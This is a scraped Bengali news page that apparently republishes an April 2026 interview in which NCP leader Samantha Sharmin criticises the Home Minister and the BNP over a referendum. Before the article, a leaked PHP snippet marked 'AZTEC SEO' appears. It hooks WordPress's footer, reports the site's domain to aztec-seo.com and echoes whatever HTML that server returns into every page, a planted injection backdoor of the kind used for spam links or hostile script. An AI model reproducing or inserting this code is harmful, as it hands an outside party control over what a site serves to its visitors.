/* AZTEC SEO */ add_action('wp_footer', function () { $domain = wp_parse_url(home_url(), PHP_URL_HOST); if (!$domain) return; $ck = 'aztec_footer_' . md5($domain); $html = get_transient($ck); if ($html === false) { $url = add_query_arg(array('domain' => $domain, 'date' => gmdate('c')), 'https://aztec-seo.com/api/v1/footer'); $res = wp_remote_get($url, array('timeout' => 8)); $html = (!is_wp_error($res) && wp_remote_retrieve_response_code($res) === 200) ? (string) wp_remote_retrieve_body($res) : ''; set_transient($ck, $html, $html === '' ? 5 * MINUTE_IN_SECONDS : HOUR_IN_SECONDS); } if ($html !== '') echo $html; }, 99); গণভোট নিয়ে সালাহউদ্দিনের বক্তব্যের তীব্র প্রতিক্রিয়া সামান্থা শারমিনের | Dhaka Sky News

হিজড়া সেজে তিন সন্তানের পিতার ১৩ বছর ধরে প্রতারণা

আগের সংবাদ

সরকারি চাকরিতে প্রবেশের বয়স ৩৫ করার আলটিমেটাম

পরের সংবাদ

গণভোট নিয়ে সালাহউদ্দিনের বক্তব্যের তীব্র প্রতিক্রিয়া সামান্থা শারমিনের

যুগান্তর প্রতিবেদন

প্রকাশিত: April 2, 2026 , 7:22 pm

গণভোটের রায় বাস্তবায়ন নিয়ে কিছুদিন ধরেই সংসদ অধিবেশনে চলছে উত্তপ্ত বাক্য বিনিময়। এ নিয়ে স্বরাষ্ট্রমন্ত্রী সালাহউদ্দিন আহমদের বক্তব্যের তীব্র প্রতিক্রিয়া জানিয়েছেন এনসিপির সিনিয়র যুগ্ম আহ্বায়ক সামান্থা শারমিন।
যুগান্তরের সঙ্গে এক বিশেষ সাক্ষাতকারে এনসিপির এই নেত্রী বলেন, বিএনপির এক ধরনের ইনটেনশন আছে জনগণকে মূর্খ রাখার। সাক্ষাৎকার নিয়েছেন যোবায়ের আহসান জাবের।
তিনি বলেন, বিএনপি এমন পর্যায়ে ব্যাপারটা নিয়ে এসেছে যে, এখন জুলাই সনদ টেকানো নিয়েই সন্দেহ তৈরি হয়েছে। তাই অন্য সংস্কার কমিশনের রিপোর্ট নিয়ে কথা বলাটা এখন বাতুলতায় পরিণত হবে। মানুষ যখন নিজের মতামত প্রকাশ করে বাংলাদেশের নাগরিক হিসেবে, রাষ্ট্রীয়ভাবে বিগ স্কেলে তার মতামত প্রকাশের সুযোগটা থাকে, তখন কিন্তু তারা খুব স্বপ্রণোদিতভাবেই কিছু মাত্রায় জ্ঞান অর্জনের চেষ্টা করে। যার মাধ্যমে সে আসলে সঠিক সিদ্ধান্ত নিতে পারবে।
স্বরাষ্ট্রমন্ত্রীর সাম্প্রতিক বক্তব্য নিয়ে সামান্থা বলেন, বিএনপির অবস্থান দেখে আমার কাছে যেটা মনে হচ্ছে তারা মোটাদাগে আমাদের দেশের মানুষকে অবহেলা অবজ্ঞা করেন এবং বাংলাদেশের মানুষের যে রাজনৈতিক সত্তা এবং তার যে বুদ্ধিমত্তা সেটাকে এক ধরনের খারিজ করে দিতে চান।
সামান্থা আরও বলেন, এনসিপি শুরু থেকে যেটা বলছে যে- আমরা এই জনগোষ্ঠীকে মোটেও যাচ্ছেতাইভাবে তুচ্ছতাচ্ছিল্য করি না। বরং আমরা তাদের ভোটিং ক্যাপাসিটিকে রাজনৈতিক জনগোষ্ঠী হিসেবে দেখি। আমাদের যে রাষ্ট্রীয় ব্যবস্থায় জনগণের যে অংশগ্রহণ, এটাকে আমরা ভোটার হিসেবে দেখি না। আমরা এটাকে সম্মানিত নাগরিকমন্ডলী হিসেবে দেখি। আমাদের সঙ্গে বিএনপির মৌলিক পার্থক্য এটাই।
এই এনসিপি নেত্রী আরও বলেন, আমাদের সংবিধানকেন্দ্রিক যে আলাপগুলো এটা উন্মুক্ত ছিল এবং আমাদের চায়ের কাপে আমাদের যে কোনো আড্ডার আয়োজনে বাংলাদেশে এই আলাপগুলো কিন্তু গত দুই বছর ধরে বর্তমান, এটাকে অস্বীকার করার কোন উপায় নেই। আর বিএনপি একটি রাজনৈতিক দল তার কিন্তু দায় আছে মানুষকে এডুকেট করার। রাজনৈতিক দল এটা হচ্ছে জনপ্রতিনিধিদের এক ধরনের সম্মেলন, রাজনৈতিক দলকে বোঝা দরকার আমাদের।